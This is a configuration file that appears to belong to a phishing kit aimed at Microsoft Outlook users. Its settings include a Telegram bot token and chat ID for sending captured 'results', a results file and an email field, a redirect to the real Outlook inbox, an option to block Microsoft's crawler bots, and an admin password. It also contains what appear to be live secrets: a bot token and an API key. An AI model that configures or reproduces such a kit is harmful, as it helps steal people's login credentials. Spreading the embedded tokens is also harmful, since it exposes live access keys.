;Your bot token here
bot="5333893298:AAGg1u9r5tmsQJwJYZcQSbT1Jgb3LWzjTwc"
;Your Chat Id here
chat="5275069098"
;Name You can change your name here
name="oss"
;your admin panel password
password="2c7e2cc232bb2d9d454"
;Your email for results here
email='';
;Your Redirect Url Here
finish="https://outlook.office.com/mail"
;your whitelisted ip
ip = ""
;To send visits or not 1/0
send_visit="1"
;To block microsoft bot set to 1
block_bot="1"
;Your file name to save your results
results_file="rets.txt"
;Your api key here,you can get one from 
api="9e3555a502b5731c638a312ac6a45ecfafa326f9e8d3ce078a"